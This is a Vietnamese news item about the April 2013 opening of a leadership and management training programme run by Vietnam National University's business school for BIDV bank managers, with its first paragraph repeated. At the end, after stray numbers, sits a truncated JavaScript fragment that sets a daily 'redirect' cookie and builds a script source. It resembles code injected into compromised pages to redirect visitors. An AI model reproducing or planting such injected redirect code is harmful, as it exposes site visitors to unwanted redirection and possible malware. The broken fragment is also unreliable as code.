Chương trình đào tạo kỹ năng lãnh đạo

11Sáng 8/4/2013, Khoa Quản trị Kinh doanh (HSB) thuộc Đại học Quốc gia Hà Nội (VNU) đã phối hợp với Trường Đào tạo Cán bộ BIDV tổ chức buổi lễ khai giảng “Chương trình đào tạo kỹ năng lãnh đạo, quản trị và điều hành cho các cán bộ quản lý cấp ban/trung tâm/đơn vị thành viên quy hoạch của Ngân hàng TMCP Đầu tư và Phát triển Việt Nam (BIDV).

Sáng 8/4/2013, Khoa Quản trị Kinh doanh (HSB) thuộc Đại học Quốc gia Hà Nội (VNU) đã phối hợp với Trường Đào tạo Cán bộ BIDV tổ chức buổi lễ khai giảng “Chương trình đào tạo kỹ năng lãnh đạo, quản trị và điều hành cho các cán bộ quản lý cấp ban/trung tâm/đơn vị thành viên quy hoạch của Ngân hàng TMCP Đầu tư và Phát triển Việt Nam (BIDV).

Tham dự lễ khai giảng chương trình có PGS. TS. Hoàng Đình Phi, Phó Chủ nhiệm HSB; TS. Nguyễn Xuân Quang, Phó Giám đốc Trường Đào tạo Cán bộ BIDV; và 34 học viên là các cán bộ quy hoạch, tiền bổ nhiệm vị trí lãnh đạo các ban/trung tâm và chi nhánh của BIDV trên toàn quốc.

Rất nhiều học viên đến từ các tỉnh thành xa xôi của tổ quốc. Phát biểu khai mạc, PGS. TS. Hoàng Đình Phi đánh giá cao tinh thần học tập và sự tham gia nhiệt tình của tất cả các học viên và chúc các anh chị học viên có thời gian trải nghiêm học tập thú vị, có cơ hội cập nhật kiến thức mới và nâng cao các kỹ năng cần thiết để phát triển nghề nghiệp, hoàn thành tốt nhiệm vụ tại BIDV và tiếp tục có những đóng góp cho việc phát triển các DNVN thông qua các hoạt động tư vấn và cung cấp tín dụng.

Chương trình đào tạo này được HSB thiết kế và triển khai theo yêu cầu nâng cao chất lượng nguồn nhân lực của BIDV, đặc biệt là việc nâng cao các kỹ năng lãnh đạo, kỹ năng quản trị và kỹ năng điều hành trong bối cảnh hội nhập và cạnh tranh toàn cầu. Đa số các giảng viên là PGS và TS có uy tín, có kinh nghiệm nghiên cứu, tư vấn và giảng dạy chuyên ngành. Tất cả các đề cương và slides bài giảng đều được hội đồng chuyên môn kiểm tra và góp ý trước khi giảng dạy để đảm bảo chất lượng đào tạo và đáp ứng các nhu cầu của học viên.

Sau các buổi học đầu tiên, học viên đánh giá cao chất lượng đào tạo, không khí học tập trên lớp và công tác hỗ trợ học viên của HSB

11

12

{var U=(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’